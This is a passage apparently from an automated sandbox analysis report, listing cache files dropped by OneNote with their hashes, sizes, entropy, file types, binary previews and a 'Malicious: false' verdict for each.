SHA1:	078FA63FC7DB5830E9059DF02D56882240429D90
SHA-256:	D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
SHA-512:	8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`...C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%\|.f.~.......:y....S....UKovh...W'........lF... .................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.7352901783761467
Encrypted:	false
SSDEEP:	96:1sBh92K+SVkBLQoWE5vXj9Fim3hRQ5BTN5i:1sBz2K+ZZQQ5vXj94m3hRCBT
MD5:	489FA02A50CE0167632419D15613B5A2
SHA1:	4F625EAD0462D8CF51CB30142920FEE934CDE020
SHA-256:	D33F8FAAB08E93661C0132735181C7959C504E0487A8B33D79E05C2F47BB6B36
SHA-512:	4F0380F436AB0497242ECDE6371AE5E89DF15E2273D47245AAFDBE9131121C792868C7D22CBA29D14A3DB8FE0E4EFAB5C1374D4A512EDFC3D79EF133CDDD58E7
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...........v................................I.......I.qk..B.....LZj.Y.....j.Y{.&..$>......j.Y{.&..$>......j.Y..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................&U<.6..N~.......N...^.....................C.K.1.."T............................................^....I.qk..B.....LZ................&U<.6..N~...............&U<.6..N~............j.Y.....j.Y.....j.Y.........................................j.Yj....j.YT.l..j.Y.....j.Y..Q..j.Y..Q..j.Y..>..j.Y.....j.Y .3...................;........4...4...4.."..............j.Y.j.Y.j.Y..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........j.Y.....j.Y....#j.Y............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
Category:	dropped
Size (bytes):	3009
Entropy (8bit):	7.493528353751471
Encrypted:	false
SSDEEP:	48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
MD5:	D9BD80D40B458EDB2A318F639561579A
SHA1:	83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
SHA-256:	509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
SHA-512:	C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''*''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .te..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N..............#..M<\|.2.Y.../QO.x.cTM4......+.F;V.x.de....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........\|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
Category:	dropped
Size (bytes):	2266
Entropy (8bit):	5.563021222358941
Encrypted:	false
SSDEEP:	24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
MD5:	DB8A181E3F0EAD4A9472099E42ED6BE3
SHA1:	92096AF05CC6167B1AA816811A1160B809393FA2
SHA-256:	E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
SHA-512:	A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......\|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~\|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.\|.....5h.y.%.~...G

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.326597027699643
Encrypted:	false
SSDEEP:	48:YuuRsPPH0+ritzSvEgLX9iIG9e46oxrdQqr2q6BXGCh4ch:YPRs30+ri9cEaXY9eDgRQyUo8
MD5:	F8832D22E349C449BC4619700A3C6707
SHA1:	545F791692FEED7D15D393EFE12A1028003BCCE9
SHA-256:	A269DF863BBBECC1F22BD919DB18F3E5C504C0F1368D581B045371B075EDBCA9
SHA-512:	85EA71E8DA499AA97BEC5EF0917D9B7C03B8DF1F5046B7DD9C32C808E1ACF6364B427CBB762A23219EE3084DCFE325C40C9158D031AD56EF0A9A8BDB9CB4D0DF
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.P.......P...P.3.Z?..8.P...P.3.Z?..8.P...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............:@.MW.......Vj&....N...^...............[z.A..1N..............f........................................I.qk..B.....LZ.............:@.MW.......Vj&.........:@.MW.......Vj&..........P.......P.......P...........................................P.j.....P.T.]...P.......P...B...P.H.....P...B...P...>.).P...J...................;........4...4...4.."...............P...P...P...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........P.......P.....#.P.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	99293
Entropy (8bit):	7.9690121496708555
Encrypted:	false
SSDEEP:	1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
MD5:	EA45266A770EEA27A24A5BB3BE688B14
SHA1:	9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
SHA-256:	EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
SHA-512:	D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
Malicious:	false
Preview:	.PNG........IHDR...-...c............sBIT....\|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..[Oh\E...y3kv........`.%m.R..6.1.4).o..Ki...D.......P!.].=..K...C[....f.}o7VPJIg...{3.\|....d.....i..=.4.u0...n y......@j..Q..f)..mQ...4-SJ..9.d.?..5\-....:b.W..i...c.5..{..pj#.....B1C/.I.......].Su.k?.2..:.9Q...5.U...UZ...e..U.c],..2.}...1..)W./..Epr.Zt.....K.=..{......e..."...v..B.4.#....A.V1.".V}t..[..2f..Y..V9.".6.......(..gbm.P.....Y%2.c.z.:Q.2.<tYF.....u.@..KJ.;u.q:.].....$.....V....Hqk..DW.l.e.j.Z.YP?:'R...<........6...m@..r..j2..HK"\|..L.Nc..D..y.9..B4$.......`.3.m1LE....7(OU\+./.O...%6T..w......h....).I.&n.........#..W.41...5.#.`..I...<.?.\|..+Q.....#i........$,..n...`.s....[..E. T.w..j.,&-.r..;a....#.>(.P......f...MU\3..;B....)..5....z..(....-...a.....}y.l..E...z>......&..g.$.....*T...N....E:./.>..#...^..E.0..%......(..@..W.X.NDM.<~.]A.>..fW.O.y.'...Z...h..).F..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.366296146543238
Encrypted:	false
SSDEEP:	96:YXRsD7ClKrIWEP/Xg9+DARQy8ZfGsl+x5KE0/Ggil:KRsD7ClKrcP/Xg9+DARJ8ZfGsl+x5KE5
MD5:	4FF13DC0C9E9FB271219D10452B0537A
SHA1:	5238686A94DE9F944514E103136ED7C3468ABA04
SHA-256:	E971D59C5011983BB02FA31717F6329F7C94589FEA49C3F3669B77DE0651F0DF
SHA-512:	E0B82742F14F36AF43315941138625C29DC990D6AE50F22B2E51A514194DB8EA883EBC50EE298BC01622A71F9F74AC2365671376BFB5ABDA40B697ADB6171F9C
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZk......k..&..m.:..k..&..m.:..k...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................8..>2.....,....N...^.................4.j..N.H*E..g.........f........................................I.qk..B.....LZ...............8..>2.....,...........8..>2.....,.........k......k......k..........................................k.j....k.T.]..k......k...B..k.H....k...B..k...>.)k...J...................;........4...4...4.."..............k..k..k...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4.........k......k.....#k.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
Category:	dropped
Size (bytes):	2898
Entropy (8bit):	7.551512280854713
Encrypted:	false
SSDEEP:	48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
MD5:	7C7D9922101488124D2E4666709198AC
SHA1:	00CC44A1B84D4D94A0ACE8834491EB5F65D04619
SHA-256:	20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
SHA-512:	882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................\| F.. ...j...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.313711359385232
Encrypted:	false
SSDEEP:	48:usyfT8A2O4t/8ESh7xTWXa5TW9I18ocSrdQqrRW3Dig2BXMbMpvJZDZMYl4Lbg:ushO4WEShdWXapW9TtSRQyRiiHRl4
MD5:	EA9E0CF0A261F01EF636D22B452A73A2
SHA1:	01E961535DA1ACEC4BF9AEA9E6953830F05D1B98
SHA-256:	C1C8A659541C9A63A602999C354F60D860F0B41334B7A7D76BCFE19217B7469D
SHA-512:	7C140D4C0DAD7803C5E06EA77F19F344D65997F870BFD331BCE1ECA72E63F545012F80EF519D2BA2C952DD8B2333397EE429A59B5977A91F99C02DF10AB4FA97
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.z.......z.)..b..jK.....z.)..b..jK.....z...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................A.........7.....N...^................2...U.E.nG..! .........f........................................I.qk..B.....LZ................A.........7.............A.........7...........z.......z.......z...........................................z.j.....z.T.]...z.......z..B...z.H.....z...B...z...>.).z...J...................;........4...4...4.."...............z...z...z...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........z.......z.....#.z.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
Category:	dropped
Size (bytes):	29187
Entropy (8bit):	7.971308326749753
Encrypted:	false
SSDEEP:	768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
MD5:	DF99CAAAB9A7DE97B63343E60A699AB6
SHA1:	B84334135CFB73BC6EF55F85926770D5AC6DFEA8
SHA-256:	74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
SHA-512:	5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;.'.f.5^.....m..<$....8.R.j.D.v..>...dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%..S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..\|D...+...NA....Y.^f.1\|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N......U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.616219113007859
Encrypted:	false
SSDEEP:	96:XzIs2hx+elEYY6OXxa9kgRQymhSmYdBskPmnB1:XzIs2h7yxdXxa9kgRJmhSmYdBskPmB1
MD5:	611B2E6204DDD156818F6B71DDA56964
SHA1:	32744FEACFF4596D30AF58289FB42089A39B4B75
SHA-256:	B208BF3B4603F3817E0CB682857FEE6AE8E900702BD5B4943E8F32893E871EC8
SHA-512:	724011DDC49A52B9CD5544CED301696DA0DC534804017CACFFC6A7A1057C5EAB644571E8E97E0E0D2FF9039AC2D79D034C0808950A119D71A2A998B1BFFD27E1
Malicious:	false
Preview:	:...F...,.......V.......................................................................................................................................:...F...j.......V................................I.qk..B.....LZ............`....r..S...%l.........`....r..S...%l.....:...F...........V.............................I.......I...................................................I.t.....I................................................................4..'...'.....................................................................~................................................................................................I.qk..B.....LZ..............T.......T.......T...........................................T.j.....T.T.]...T.......T...B...T.H.....T...B...T...>.).T...J...................;........4...4...4.."...............T...T...T...z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........T.......T.....#.T.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
Category:	dropped
Size (bytes):	4819
Entropy (8bit):	7.874649683222419
Encrypted:	false
SSDEEP:	96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
MD5:	5D6C1F361BC04403555BE945E28E53FC
SHA1:	00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
SHA-256:	131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
SHA-512:	34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V...S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.\|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	2.500015609543053
Encrypted:	false
SSDEEP:	24:+m5yekzJmI2Z7VydNDpqUlxIx7gUlX6FlmmecUlSkl2VFwqcPUli60QX/qo1UlK5:+YEznpdN9lGtplEsmsl/awklB0tBlW
MD5:	AB91EDE5C316A03E39C495DA0C427C3A
SHA1:	C98255A42CD01564F8AC930607315F4A6755C0A4
SHA-256:	6695AF57A69248C9811D84A68FEE1DC299432FEF368BE12D1621C3F961D97DD5
SHA-512:	DDBCDB7695548EABAD40915FF123D953FFA0CEF42327D3901836F23826E6EA26286F6CEF8EDA8BFFB1A803A5AF3BBB2FD45FC1D81DBF5F01B59BF0ECFBE23FDB
Malicious:	false
Preview:	......................................?...................................................................................................................................................................}.......}n~H..&..e..[...........B...K.#9.'.. .+.-....5...M.SN.+..........6...x........W...'.1om.@...............................................................................j.....`....x....7..x....Q..x....Y..x....a..x....n....................4..~...1...(...(.......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.T.e.m.p.l.a.t.e.s.\.1.0.3.3.\.O.N.E.N.O.T.E.\.1.6.\.S.t.a.t.i.o.n.e.r.y.......S.t.a.t.i.o.n.e.r.y.............1.......S.t.a.t.i.o.n.e.r.y............x....1... ..$....S.t.a.t.i.o.n.e.r.y........>.......>.l3....c...wjq...........W...'.1om.@.2...........R.................................................................c..,............................c..,0.................C@...B.+................x...x....1... ..$....S.t.a.t.i.o.n.e.r.y...........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.6356297934929773
Encrypted:	false
SSDEEP:	12:g6LKu6l/GOwrdgaqfJfVtVTwMJKl/ilCgJilmxil6togul/UazVAkY9RHQWZQNql:HLUlONQtxzogBDoJl8az2rsVNXwumV8
MD5:	9AE96A675834A8EF46F32233A89EE21A
SHA1:	F22D0C33A80FE79C642C9041861C82018EFA34B1
SHA-256:	1621F39C95F58512F878579AE14893DCF3B4C2D2D2CF793485FAC078225F3DCA
SHA-512:	26567D29FB993F14970F59855C54F7059F616F79D110FA9EEA9FA42165D05FFCEFBC8809AEC2CF3A2D6FA37A0DE5394DE27647336E120203C218BFE7E4F045F2
Malicious:	false
Preview:	......................................................................................................................................................../<@...../<@XY..F.:..[.&............I.X.L..}.].-..........{7.N...K..r&.2.....&.2H=..B.j5... .Y.;....@..S....Y.;.&.2H=..B.j5... .&.2....I.X.L..}.].-..............Y.;.....Y.;.................................................&.2N.2..Y.;..(..Y.;`......................................................4..~...1...(...(...h...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.T.e.m.p.l.a.t.e.s.......T.e.m.p.l.a.t.e.s...............1.......T.e.m.p.l.a.t.e.s..............&.2..1... ..$....T.e.m.p.l.a.t.e.s.........Y.;.....Y.;....@..S...............I.X.L..}.].-.2.......&.......................&.2.Y.;.......................................c..,....................G..2.).......N...^................!.....I.F...................................................................................!.....I.F..................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7327493822047978
Encrypted:	false
SSDEEP:	12:DaCmUfg2tZDXDwVhEiDwVeEWDwVhaagqQEgFagS:ODeg2MVh6VeEpVcagqUFag
MD5:	09D72339D8696B89D15395FB18920692
SHA1:	DC1F2EB28B7833AE443472BC9FC1EC1115C25D77
SHA-256:	D7528EFB8428DE39D73289D56B82640B5C62BA83B06C9CBC1F7C92149670DD48
SHA-512:	70F5049F57CB8BC797247AAD432CC7BB33AA9D0AA6434A251E0CADA4BEA4B5275176F898A9F7B88FDE1D8CE887FD349881FECAD56F1DFB7258A38B84FB698448
Malicious:	false
Preview:	2...>..........................?..........................................................................................................................................................................m.......m..a.G...F.qM..Dq......Dq...FC..+.2..t.Dq...FC..+.2..t.Dq...m..a.G...F.qM...m...............................Dq......Dq..................................................Dq..#...Dq\.....DqN.!....................................................4..1...(...(.......L.i.v.e.C.o.n.t.e.n.t...........1.......L.i.v.e.C.o.n.t.e.n.t................m..c..,....................Dq..1... ..$....L.i.v.e.C.o.n.t.e.n.t.............v.=.q.FC.50!...}....N...^...........................................................................................................v.=.q.FC.50!...}....................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.9115094211346324
Encrypted:	false
SSDEEP:	6:9/RssLAC5kayL6s8E2BMu8urIYI+yKls6Tx8M4DAC4Ly72BNRyflP3X4ADAgArwk:zPLAC5ka461JKKFCDKjNRmFHvDSQEl
MD5:	2FA30E92EC6BDDA5C1BDF83A33EF4404
SHA1:	8131AD4EE52D9A26E914188DAF37C6723A23A059
SHA-256:	FC91ADB966CC17C447EF3A73D80B81A8D3FE55F1EC01263CCAA0B9372C1AACD7
SHA-512:	0E60E030B3ED6C61279B397B64C045B1D0BC267E64CF8284B821B6D1066F41AA59F6C5A75E72E3F11B106E14D01E6D254BD5668DFD66790DABCFDAD2AFC8BC8F
Malicious:	false
Preview:	....>....................................................................................................................................................................................................O.......O..Qt.I......().............QK..j...C..O..Qt.I......().O.......QK..j...C.......4.R..N...g...e..4...........O.......O...................................................O...+...O.\.....O.N.....O.N.)...............................................c..,.........................4..1...(...(.......1.6.............O...1... ..$....1.6.........4.......4.R..N...g...e.............QK..j...C.2................................O.........................................4..c..,....................O...O...1... ..$....1.6...........M...'..L.^.c...h....N...^...........................................................................................................M...'..L.^.c...h............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	OpenPGP Public Key
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.403076563231452
Encrypted:	false
SSDEEP:	24:ucEzmxCE6o1FL1gl/VT3lHlqzVnnliblO:u5zm4gzC9xHlwnliRO
MD5:	66CBEA88A991014A5EBE49A7823FD150
SHA1:	5CAEF311279EFBF5C240210A16521F5086695D36
SHA-256:	D04D6C856A8E7F0EBABB13517B420F204AAAC621671DDB6636DBF87D728DA70A
SHA-512:	1EF14587A70902710077358A4AFA9C39FC62D5CA526D35EEB842FA6A03261C5FD7A0BDE08610A2DC16830A1A71AE8502DFFBE34FC1230F23F328222F477BCA46
Malicious:	false
Preview:	.......................................................................................................................................................................................................i.......i......L........d.......d....T.G...?..J........B.lQ.\.q.....d....T.G...?..JZd....&.'..tI...`.....&...........i.......i...................................................i....B..i..\....i..N....i..N...i..N.:..i..N.@..........................d....c..,.........................4..1...(...(.......M.a.n.a.g.e.d..........i....1... ..$....M.a.n.a.g.e.d............................B.lQ.\.q..&.......&.'..tI...`....2...............................i....&....................................&...c..,...................i...i....1... ..$....M.a.n.a.g.e.d.........d.......d....T.G...?..JZ.p.......p.q..N..)..6..i......L........i....p.q..N..)..6...p..........................>................&.'..tI...`..............................................p...c..,...................i...i...i....1... ..$....M.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.7228767498165645
Encrypted:	false
SSDEEP:	6:jxfEIJM5+c5mscof26x8CAXCkfWWAXlSZcw1ESXK:KP3DcofEXnu9XlSZcQESa
MD5:	9D33F4CE4698BA3937BFBE8D8C91D0E5
SHA1:	485B1EEB4ACF2AEEA562011ABAEF8CB2CEC1B2D7
SHA-256:	5F4497D3B5649CD027E7B8E0293E6ABF1A5011A6695791AF57578662291FA6E7
SHA-512:	5DF65B0663C9E93D65037C42362B691DD8C75EAB5546D671B5AC3B49EE867F2B99A887509221F2BD1AF13ECCA6ACC7EDC2F50B7AF77FD6D69842AAA16952A031
Malicious:	false
Preview:	2...>....................................................................................................................................................................................................= ......= .N8.L.......n.......n.-..@.u.T....n.-..@.u.T....n...= .N8.L.......= ...............................= ......= ..................................................= ..!...= \.....= N.....................................................n...c..,.........................4..1...(...(... ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s...........= ..1... ..$ ...D.o.c.u.m.e.n.t. .T.h.e.m.e.s.................k..J...72......N...^...............................................................................................................k..J...72..............................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.4836053535577858
Encrypted:	false
